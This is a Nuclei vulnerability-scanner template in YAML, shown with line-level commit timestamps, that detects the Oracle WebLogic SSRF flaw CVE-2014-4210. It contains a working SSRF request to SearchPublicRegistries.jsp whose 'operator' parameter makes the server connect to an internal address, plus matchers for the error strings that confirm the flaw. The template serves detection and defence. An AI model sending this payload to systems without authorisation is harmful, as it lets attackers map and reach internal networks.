nuclei-templates/cves/2014/CVE-2014-4210.yaml

31 lines
1.1 KiB
YAML
Raw Normal View History

2021-04-23 13:21:52 +00:00
id: CVE-2014-4210
2021-04-23 13:03:54 +00:00
info:
2021-04-23 13:21:52 +00:00
name: Weblogic SSRF in SearchPublicRegistries.jsp
2021-04-23 13:03:54 +00:00
author: princechaddha
severity: medium
2021-04-23 13:21:52 +00:00
tags: cve,cve2014,weblogic,oracle,ssrf
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-4210
- https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html
description: "Unspecified vulnerability in the Oracle WebLogic Server component in Oracle Fusion Middleware 10.0.2.0 and 10.3.6.0 allows remote attackers to affect confidentiality via vectors related to WLS - Web Services."
2021-04-23 13:03:54 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700"
2021-04-23 13:21:52 +00:00
2021-04-23 13:03:54 +00:00
matchers-condition: and
matchers:
- type: status
status:
- 200
2021-04-23 13:21:52 +00:00
2021-04-23 13:03:54 +00:00
- type: word
words:
2021-04-23 14:11:38 +00:00
- "Connection refused"
2021-04-23 13:03:54 +00:00
- "Socket Closed"
2021-04-23 14:11:38 +00:00
- "content-type: unknown/unknown"
2021-04-23 13:03:54 +00:00
part: body
2021-04-23 13:21:52 +00:00
condition: or